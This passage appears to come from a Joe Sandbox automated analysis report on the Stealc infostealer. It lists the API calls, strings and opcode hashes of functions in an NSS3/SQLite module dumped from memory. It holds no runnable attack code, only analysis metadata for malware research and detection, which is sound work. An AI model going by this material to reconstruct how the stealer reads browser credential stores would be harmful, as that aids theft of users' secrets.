                                                                                                                                                                            • Opcode Fuzzy Hash: 757f2926a0dbb5fe1eb16ed226918e486fe784eb530262e567c563d91df9d71e
                                                                                                                                                                            • Instruction Fuzzy Hash: 355159B2D002159FDB209FA8CD8496EB7B9EF65358F144929EC089B700E731ED1687F1
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C81DD56
                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C81DD7C
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C81DE67
                                                                                                                                                                            • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C81DEC4
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81DECD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 2339628231-598938438
                                                                                                                                                                            • Opcode ID: 0e6962105cdf884ea61305d42cfef93bb9bad2697d2640ea4d22e9920f3dda49
                                                                                                                                                                            • Instruction ID: 6394cbaa1d187d980a1f30b1cbedb501af002d50e915bf284e019ec2c02412f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e6962105cdf884ea61305d42cfef93bb9bad2697d2640ea4d22e9920f3dda49
                                                                                                                                                                            • Instruction Fuzzy Hash: 13A1E5716082169FC722CF29C580B6AB7F5AF95308F158D2EF8898BF41D730E945CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6C8DEE0B
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8DEEE1
                                                                                                                                                                              • Part of subcall function 6C8D1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C8D1D7E
                                                                                                                                                                              • Part of subcall function 6C8D1D50: EnterCriticalSection.KERNEL32(?), ref: 6C8D1D8E
                                                                                                                                                                              • Part of subcall function 6C8D1D50: PR_Unlock.NSS3(?), ref: 6C8D1DD3
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8DEE51
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8DEE65
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8DEEA2
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8DEEBB
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8DEED0
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8DEF48
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8DEF68
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8DEF7D
                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6C8DEFA4
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8DEFDA
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C8DF055
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C8DF060
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2524771861-0
                                                                                                                                                                            • Opcode ID: 9ff4e5a2762ae603cfa15a2d0349842cf6120956f507281c0de113e2f4a47927
                                                                                                                                                                            • Instruction ID: e2e4b65d9b3826683f214c2073853256deab0a15d9fbf825ea20e85311a6b637
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ff4e5a2762ae603cfa15a2d0349842cf6120956f507281c0de113e2f4a47927
                                                                                                                                                                            • Instruction Fuzzy Hash: B981A475A00219AFDF10DFA8DD81BDEBBB5BF19318F150424E919A3711E731E924CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_SignatureLen.NSS3(?), ref: 6C8A4D80
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6C8A4D95
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C8A4DF2
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8A4E2C
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C8A4E43
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C8A4E58
                                                                                                                                                                            • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C8A4E85
                                                                                                                                                                            • DER_Encode_Util.NSS3(?,?,6C9F05A4,00000000), ref: 6C8A4EA7
                                                                                                                                                                            • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C8A4F17
                                                                                                                                                                            • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C8A4F45
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8A4F62
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C8A4F7A
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C8A4F89
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8A4FC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2843999940-0
                                                                                                                                                                            • Opcode ID: 8e5240da370ba58c09b514fe922d46a40402539a0cb1165a16f98e0cb2898f0f
                                                                                                                                                                            • Instruction ID: 129c42efdd9f4d6996750808826c8c74079f93234ad5529347c86510c906f0ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e5240da370ba58c09b514fe922d46a40402539a0cb1165a16f98e0cb2898f0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E81A4715043019FEB21CF68DA40B5BB7E4ABC8358F14AD2DF958CB641EB31E906CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C8E5C9B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C8E5CF4
                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C8E5CFD
                                                                                                                                                                            • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C8E5D42
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C8E5D4E
                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8E5D78
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8E5E18
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8E5E5E
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8E5E72
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8E5E8B
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C8DF854
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C8DF868
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C8DF882
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(04C483FF,?,?), ref: 6C8DF889
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C8DF8A4
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C8DF8AB
                                                                                                                                                                              • Part of subcall function 6C8DF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C8DF8C9
                                                                                                                                                                              • Part of subcall function 6C8DF820: free.MOZGLUE(280F10EC,?,?), ref: 6C8DF8D0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                            • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                            • API String ID: 2028831712-1373489631
                                                                                                                                                                            • Opcode ID: 7dcded8ab50f95f85c8bb2fe5649b8af7b6fdec409a21d55585ca1c861440c13
                                                                                                                                                                            • Instruction ID: ea691a21ecdbeb842392894c7b42ccc9fc61ef371d871b364aa78ba31fdfa3d9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7dcded8ab50f95f85c8bb2fe5649b8af7b6fdec409a21d55585ca1c861440c13
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B7107B0E043159BEB209F28EE4576E3375AF5B31DF140835DC099AB42EB32E915C792
                                                                                                                                                                            APIs
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C8D781D,00000000,6C8CBE2C,?,6C8D6B1D,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C40
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C8D781D,?,6C8CBE2C,?), ref: 6C8D6C58
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C8D781D), ref: 6C8D6C6F
                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C8D6C84
                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C8D6C96
                                                                                                                                                                              • Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
                                                                                                                                                                              • Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
                                                                                                                                                                              • Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
                                                                                                                                                                              • Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C8D6CAA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                            • API String ID: 4221828374-3736768024
                                                                                                                                                                            • Opcode ID: 81abf078affb6276451c661f32e8b5a5826f09adf7769a2deb7fef7f9e0414b8
                                                                                                                                                                            • Instruction ID: b19a9be97b53ee1ca80696d003922c1329f595160b16b1408d137491829b4228
                                                                                                                                                                            • Opcode Fuzzy Hash: 81abf078affb6276451c661f32e8b5a5826f09adf7769a2deb7fef7f9e0414b8
                                                                                                                                                                            • Instruction Fuzzy Hash: A301F2A170670523E7702B7D6E4AF32390C9F81558F2A0C35FE18F0981FBA2FA1841A5
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 786543732-0
                                                                                                                                                                            • Opcode ID: 741dd1f6d911f782fb8d3e3a7f54a28d7730f198c747d95a1f09f2beb6b5dc62
                                                                                                                                                                            • Instruction ID: 689b906bb07b9e05bfa12c829a4723a12e36d37f8a01bc63c77534f18dcae9a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 741dd1f6d911f782fb8d3e3a7f54a28d7730f198c747d95a1f09f2beb6b5dc62
                                                                                                                                                                            • Instruction Fuzzy Hash: 8851A2B1A0611A9BDF20DF98EA416AE7774BF1A349F240925D814A7FC0D331E915CBE2
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6C964CAF
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C964CFD
                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6C964D44
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                            • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                            • API String ID: 2274617401-4033235608
                                                                                                                                                                            • Opcode ID: 13a4149ab25771d72c46e68350cf5795ee8f97a0f3a17252e28f6b9fc54d1ea3
                                                                                                                                                                            • Instruction ID: 556c4908a4f91a4f3b7070f03b51c76eeb951999fb1bec13936681c5e7622c87
                                                                                                                                                                            • Opcode Fuzzy Hash: 13a4149ab25771d72c46e68350cf5795ee8f97a0f3a17252e28f6b9fc54d1ea3
                                                                                                                                                                            • Instruction Fuzzy Hash: 70312572E08911ABF718C6AAE8317E573697B8231CF250525D4244BFD8C729F8628FD7
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6C962D9F
                                                                                                                                                                              • Part of subcall function 6C81CA30: EnterCriticalSection.KERNEL32(?,?,?,6C87F9C9,?,6C87F4DA,6C87F9C9,?,?,6C84369A), ref: 6C81CA7A
                                                                                                                                                                              • Part of subcall function 6C81CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C81CB26
                                                                                                                                                                            • sqlite3_exec.NSS3(?,?,6C962F70,?,?), ref: 6C962DF9
                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6C962E2C
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962E3A
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962E52
                                                                                                                                                                            • sqlite3_mprintf.NSS3(6C9CAAF9,?), ref: 6C962E62
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962E70
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962E89
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962EBB
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962ECB
                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6C962F3E
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C962F4C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1957633107-0
                                                                                                                                                                            • Opcode ID: bbcdb398e4dc26a07889d45bdf9bc70bfad455d8375b30cafb1fdf78a616bba3
                                                                                                                                                                            • Instruction ID: 969cf0e5d8ca71137059a21e1f9e6a336f0716cf14024fe2c65dc66ee6515a1a
                                                                                                                                                                            • Opcode Fuzzy Hash: bbcdb398e4dc26a07889d45bdf9bc70bfad455d8375b30cafb1fdf78a616bba3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A61ADB5E046068BEB11CFAAD884B9EB7F5EF58348F104434DC15ABB81E735E854CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(6C8B3F23,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C62
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C76
                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C86
                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2C93
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2CC6
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23,?), ref: 6C8B2CDA
                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?,?,6C8B3F23), ref: 6C8B2CEA
                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?), ref: 6C8B2CF7
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C8AE477,?,?,?,00000001,00000000,?), ref: 6C8B2D4D
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8B2D61
                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6C8B2D71
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8B2D7E
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
                                                                                                                                                                              • Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
                                                                                                                                                                              • Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2446853827-0
                                                                                                                                                                            • Opcode ID: 783339fda9f41b9f45bc85a66f91c5dc9535fb8ccc631f49a125ae00a6219490
                                                                                                                                                                            • Instruction ID: 749d0d208ac6bbb764c960378b63e1e8db52c05694659e7f0df75f1daabf0f85
